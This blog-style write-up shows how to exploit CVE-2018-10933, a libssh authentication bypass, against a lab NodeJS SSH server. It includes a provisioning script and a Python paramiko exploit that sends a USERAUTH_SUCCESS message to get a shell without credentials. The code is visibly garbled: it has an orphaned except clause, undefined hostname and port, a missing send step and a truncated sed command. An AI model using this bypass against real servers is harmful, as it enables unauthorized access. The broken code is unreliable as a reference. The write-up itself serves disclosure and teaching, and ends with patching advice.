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Exploiting a NodeJS SSH Server With CVE-2018-10933

This a vulnerability in ‘libssh’ before versions 0.7.6 and 0.8.4 which allows an attacker to circumvent SSH authentication. The public advisory issued by ’libssh’ can be found here. In the recent week CVE-2018-10933 created a great deal of excitement online.

The full range of vulnerable products using libssh was still unclear when writing, however as a proof of concept the vulnerable and deprecated NodeJS SSH server will be used in this blog.

The Vulnerability

Vulnerable Software: libssh <0.7.6 and libssh <0.8.4

The vulnerability is quite simple conceptually. A server using the above versions of ’libssh’ expect a ‘SSH2_MSG_USERAUTH_REQUEST’ message during authentication.

This bug occurs when we supply a message of ‘SSH2_MSG_USERAUTH_SUCCESS’ in place of the above, after which the server will grant us access without requiring any credentials.


Surprisingly, no one has dubbed this issue ‘Open Sesame’.

Lab Setup

npm, the package manager for NodeJS is kind enough of containing a vulnerable SSH library which uses the affected libraries. This Lab will be setup in a scotch-box vagrant image.

This package can be installed by using a provisioning script such as the following (this should also work on any Debian base with Node+npm installed):


echo 'Installing n'
npm cache clean -f
npm install -g n

echo 'Installing Node 0.12.18'
n 0.12.18

echo 'Installing node-libssh'
npm i ssh

#Make our dummy code listen on all interfaces
sed -i.bak 's/' /home/vagrant/node_modules/ssh/examples/ stdiopipe.js 

As part of our new install we already have a dummy SSH server we can execute.

The ‘stdiopipe.js’ file contains a sample NodeJS SSH server, which will reply with a banner on succesfull authentication and spawning of a shell. Here we can see how to run the server:

libssh server

A succesful banner after authenticating with the appropriate credentials:

nodejs ssh banner

A permission denied message if we fail to authenticate:

access denied

That is all we need for our lab setup.

The Exploit

To exploit this issue we will perform the following actions using the ‘paramiko’ python library:

  1. Connect to the server (in this case on port 3333)
  2. Send the ‘SSH2_MSG_USERAUTH_SUCCESS’ message to bypass authentication
  3. Invoke a shell in the established SSH channel
  4. Receive the banner sent when successfully authenticated with a shell to prove access.
#!/usr/bin/env python

import socket
import paramiko
from paramiko import *


    sock = socket.create_connection((hostname, port))
    message = paramiko.message.Message()
    transport = paramiko.transport.Transport(sock)

    print "Attempting to start SSH client."

    print "Sending USERAUTH_SUCCESS message."

    print "Attempting to open an SSH session."
    channel = transport.open_session()

    print "Attempting to invoke a shell."

    print "Retrieving banner from successful shell invocation"
    print "Banner: ", channel.recv(100)
except Exception as e:
    print('SSH Exception: {}'.format(e))

We will successfully achieve the authentication bypass and retrieve the banner, as shown below:

libssh exploit


’libssh’ is a vulnerable component, rather than a vulnerable standalone piece of software in itself. As such, identification of software using vulnerable versions of ’libssh’ should be prioritised and updated to the fixed versions.

I’ve never come across someone who required NodeJS to deploy an SSH server, however if you are one of those people downloading and using the deprecated npm ‘ssh’ library, you should migrate to an up to date and supported package which will provide greater confidence in the authentication supplied.